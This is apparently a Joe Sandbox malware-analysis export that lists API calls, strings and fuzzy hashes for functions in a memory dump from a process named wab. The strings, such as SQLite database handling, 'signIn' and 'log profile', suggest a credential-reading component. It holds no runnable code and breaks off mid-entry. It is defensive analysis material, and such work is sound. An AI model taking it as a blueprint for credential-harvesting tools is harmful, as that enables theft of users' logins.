                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpymemset
                                                  • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                  • API String ID: 1297977491-2001300268
                                                  • Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                  • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                  • Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                  • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                  • memcpy.MSVCRT ref: 0040EB80
                                                  • memcpy.MSVCRT ref: 0040EB94
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                  • String ID: ($d
                                                  • API String ID: 1140211610-1915259565
                                                  • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                  • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                  • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                  • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                  • Sleep.KERNEL32(00000001), ref: 004178E9
                                                  • GetLastError.KERNEL32 ref: 004178FB
                                                  • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$ErrorLastLockSleepUnlock
                                                  • String ID:
                                                  • API String ID: 3015003838-0
                                                  • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                  • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                  • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                  • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00407E44
                                                  • memset.MSVCRT ref: 00407E5B
                                                  • _mbscpy.MSVCRT ref: 00407E7E
                                                  • _mbscpy.MSVCRT ref: 00407ED7
                                                  • _mbscpy.MSVCRT ref: 00407EEE
                                                  • _mbscpy.MSVCRT ref: 00407F01
                                                  • wcscpy.MSVCRT ref: 00407F10
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                  • String ID:
                                                  • API String ID: 59245283-0
                                                  • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                  • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                  • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                  • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                  • GetLastError.KERNEL32 ref: 0041855C
                                                  • Sleep.KERNEL32(00000064), ref: 00418571
                                                  • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                  • GetLastError.KERNEL32 ref: 0041858E
                                                  • Sleep.KERNEL32(00000064), ref: 004185A3
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                  • String ID:
                                                  • API String ID: 3467550082-0
                                                  • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                  • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                  • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                  • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                  • API String ID: 3510742995-3273207271
                                                  • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                  • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                  • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                  • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                  • memset.MSVCRT ref: 00413ADC
                                                  • memset.MSVCRT ref: 00413AEC
                                                    • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                  • memset.MSVCRT ref: 00413BD7
                                                  • wcscpy.MSVCRT ref: 00413BF8
                                                  • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                  • String ID: 3A
                                                  • API String ID: 3300951397-293699754
                                                  • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                  • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                  • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                  • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                  • wcscpy.MSVCRT ref: 0040D1B5
                                                    • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                    • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                  • wcslen.MSVCRT ref: 0040D1D3
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                  • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                  • memcpy.MSVCRT ref: 0040D24C
                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                  • String ID: strings
                                                  • API String ID: 3166385802-3030018805
                                                  • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                  • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                  • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                  • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 00411AF6
                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                  • wcsrchr.MSVCRT ref: 00411B14
                                                  • wcscat.MSVCRT ref: 00411B2E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileModuleNamememsetwcscatwcsrchr
                                                  • String ID: AE$.cfg$General$EA
                                                  • API String ID: 776488737-1622828088
                                                  • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                  • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                  • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                  • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040D8BD
                                                  • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                  • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                  • memset.MSVCRT ref: 0040D906
                                                  • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                  • _wcsicmp.MSVCRT ref: 0040D92F
                                                    • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                    • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                  • String ID: sysdatetimepick32
                                                  • API String ID: 1028950076-4169760276
                                                  • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                  • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                  • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                  • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID: -journal$-wal
                                                  • API String ID: 438689982-2894717839
                                                  • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                  • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                  • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                  • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                  • EndDialog.USER32(?,00000002), ref: 00405C83
                                                  • EndDialog.USER32(?,00000001), ref: 00405C98
                                                    • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                    • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                  • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                  • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Item$Dialog$MessageSend
                                                  • String ID:
                                                  • API String ID: 3975816621-0
                                                  • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                  • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                  • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                  • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _wcsicmp.MSVCRT ref: 00444D09
                                                  • _wcsicmp.MSVCRT ref: 00444D1E
                                                  • _wcsicmp.MSVCRT ref: 00444D33
                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmp$wcslen$_memicmp
                                                  • String ID: .save$http://$https://$log profile$signIn
                                                  • API String ID: 1214746602-2708368587
                                                  • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                  • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                  • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                  • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                  • String ID:
                                                  • API String ID: 2313361498-0
                                                  • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                  • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                  • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                  • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetClientRect.USER32(?,?), ref: 00405F65
                                                  • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                  • GetWindow.USER32(00000000), ref: 00405F80
                                                    • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                  • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                  • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                  • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMessageRectSend$Client
                                                  • String ID:
                                                  • API String ID: 2047574939-0
                                                  • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                  • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                  • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                  • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                  • String ID:
                                                  • API String ID: 4218492932-0
                                                  • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                  • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                  • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                  • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                    • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                    • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                  • memcpy.MSVCRT ref: 0044A8BF
                                                  • memcpy.MSVCRT ref: 0044A90C
                                                  • memcpy.MSVCRT ref: 0044A988
                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                    • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                  • memcpy.MSVCRT ref: 0044A9D8
                                                  • memcpy.MSVCRT ref: 0044AA19
                                                  • memcpy.MSVCRT ref: 0044AA4A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID: gj
                                                  • API String ID: 438689982-4203073231
                                                  • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                  • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                  • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                  • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                  • API String ID: 3510742995-2446657581
                                                  • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                  • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                  • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                  • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                  • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                  • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                  • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                  • memset.MSVCRT ref: 00405ABB
                                                  • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                  • SetFocus.USER32(?), ref: 00405B76
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$FocusItemmemset
                                                  • String ID:
                                                  • API String ID: 4281309102-0
                                                  • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                  • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                  • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                  • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintfwcscat
                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                  • API String ID: 384018552-4153097237
                                                  • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                  • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                  • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                  • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                  • String ID: 0$6
                                                  • API String ID: 2029023288-3849865405
                                                  • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                  • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                  • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                  • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                  • memset.MSVCRT ref: 00405455
                                                  • memset.MSVCRT ref: 0040546C
                                                  • memset.MSVCRT ref: 00405483
                                                  • memcpy.MSVCRT ref: 00405498
                                                  • memcpy.MSVCRT ref: 004054AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$memcpy$ErrorLast
                                                  • String ID: 6$\
                                                  • API String ID: 404372293-1284684873
                                                  • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                  • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
